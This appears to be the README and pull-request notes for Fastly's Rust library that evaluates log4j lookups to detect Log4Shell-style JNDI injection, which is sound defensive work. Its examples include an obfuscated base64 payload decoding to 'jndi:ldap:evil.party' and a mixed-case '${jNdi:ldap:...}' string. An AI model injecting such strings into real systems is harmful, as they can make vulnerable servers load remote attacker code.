A Rust library for evaluating log4j substitution queries in order to determine whether or not malicious queries may exist.

Overview

log4j_interpreter

Limitations

Encoding

This tool assumes any log line has already been decoded before being passed to the tool. For example, if the log line is still URL encoded or base64 encoded when it is passed to this tool, the encoded lookups will bypass the tool's checks. Only fully decoded log lines should be passed to the tool.

Interpolation

This tool assumes it's operating on entire log lines at once. Should the processed lines be passed to additional log aggregators that interpolate values again, this tool does not capture cases where the interpolated values re-expose a vulnerability.

Test Executable

This package includes a test executable to which test strings can be passed on the command line.

Here is an example detecting an obfuscated use of jndi:.

$ ./log4j_interpreter
Usage: ./log4j_interpreter [test string]
$ ./log4j_interpreter 'hello ${base64:JHtqbmRpOmxkYXA6ZXZpbC5wYXJ0eX0=}'
Substituted: hello jndi:ldap:evil.party
JNDI: true
ENV: false
Recursion Limit: false

Here is an example that allows a benign string to pass:

$ ./log4j_interpreter 'a benign string ${base64:d2l0aCBzb21lIGJhc2U2NA==}'
Substituted: a benign string with some base64
JNDI: false
ENV: false
Recursion Limit: false
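The evaluation the two sessions above show, written out as an added example (this is not the crate's own code): lookups are resolved innermost-first, lookup names are matched case-insensitively as the PR notes describe, `${env:NAME:-default}` expands to its default, and the result reports the same JNDI / ENV / recursion-limit findings. The base64 decoder, the `MAX_SUBSTITUTIONS` cap and the `Verdict` type are this example's own assumptions.

```rust
// Added example (not the crate's own code): a simplified evaluator for log4j
// `${lookup:arg}` syntax. Lookups resolve innermost-first with case-insensitive
// names; base64/lower/upper/env expand, jndi is flagged, others keep their body.
const MAX_SUBSTITUTIONS: usize = 16;

pub struct Verdict {
    pub substituted: String,
    pub jndi: bool,
    pub env: bool,
    pub recursion_limit: bool,
}

/// Minimal std-only base64 decoder (standard alphabet; padding is skipped).
fn b64_decode(s: &str) -> Option<String> {
    const T: &[u8] = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    let (mut acc, mut bits, mut out) = (0u32, 0u32, Vec::new());
    for c in s.bytes().filter(|&c| c != b'=') {
        // keep at most 18 carried bits so the shift cannot overflow
        acc = ((acc & 0x3FFFF) << 6) | T.iter().position(|&t| t == c)? as u32;
        bits += 6;
        if bits >= 8 { bits -= 8; out.push((acc >> bits) as u8); }
    }
    String::from_utf8(out).ok()
}

pub fn evaluate(line: &str) -> Verdict {
    let (mut text, mut jndi, mut env, mut limit) = (line.to_string(), false, false, false);
    let mut count = 0;
    loop {
        // innermost lookup: the last "${" before the first "}" that follows a "${"
        let first = match text.find("${") { Some(p) => p, None => break };
        let close = match text[first..].find('}') { Some(c) => first + c, None => break };
        let open = text[..close].rfind("${").unwrap_or(first);
        if count == MAX_SUBSTITUTIONS { limit = true; break; }
        count += 1;
        let body = text[open + 2..close].to_string();
        let (name, arg) = body.split_once(':').unwrap_or((body.as_str(), ""));
        let replacement = match name.to_ascii_lowercase().as_str() {
            "base64" => b64_decode(arg).unwrap_or_default(),
            "lower" => arg.to_ascii_lowercase(),
            "upper" => arg.to_ascii_uppercase(),
            // undefined variable expands to "" unless a `:-default` is given
            "env" => { env = true; arg.split_once(":-").map_or("", |(_, d)| d).to_string() }
            "jndi" => { jndi = true; body.clone() }
            _ => body.clone(),
        };
        text.replace_range(open..=close, &replacement);
    }
    Verdict { substituted: text, jndi, env, recursion_limit: limit }
}
```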
Comments
  • handle alternate ASCII case for log4j lookups

    handle alternate ASCII case for log4j lookups

    this PR builds on #2. log4j handles ${jNdi:ldap:your.cool.hostname} the same way it handles a lower-case ${jNdi:ldap:your.cool.hostname}, and the parser should recognize this. it seems that case-insensitivity applies for all log4j lookups, but does not normalize over things like unicode characters that lower-case to a useful ASCII character.

    conveniently, this makes case-insensitive matching here pretty easy to add.

    opened by awortman-fastly 1
  • Add better date handling.

    Add better date handling.

    We had a report that some date fields weren't properly handled. This PR adds stronger date expansion support.

    New handlers were added by more closely investigating the log4j documentation around ${date:...}.

    • https://logging.apache.org/log4j/2.x/manual/lookups.html
    • https://docs.oracle.com/javase/6/docs/api/java/text/SimpleDateFormat.html
    opened by sw17ch 0
  • handle 'date' and 'main' lookups, expand 'env'

    handle 'date' and 'main' lookups, expand 'env'

    The logic for these lookups is simple and lossy, but that's acceptable since we can at least report that these lookups will be made. For some users it is reasonable to simply reject a log line at the presence of main or date, regardless of later findings. For other users, it doesn't seem possible to have a general transformation between a main or date lookup, and a string useful to build other more concerning lookup tokens (like jndi or env).

    edit: also adjusted the env expansion to assume that env vars are for undefined variables (so, expand to ""), but use a default value if one is provided - ${env:UNDEFINED:-hello} should expand to hello.

    opened by awortman-fastly 0
Owner
Fastly